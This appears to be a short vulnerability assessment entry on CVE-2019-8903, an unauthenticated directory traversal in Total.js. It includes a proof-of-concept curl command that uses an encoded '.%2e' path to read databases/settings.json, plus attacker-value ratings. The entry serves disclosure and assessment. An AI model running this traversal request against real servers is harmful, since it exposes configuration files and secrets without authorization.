Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.
Recent assessments:
Mad-robot at July 05, 2020 2:29pm UTC reported:
Totaljs – Unathenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /…/databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
Refer:-
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903>
PROOF OF CONCEPT
$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by def.)
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5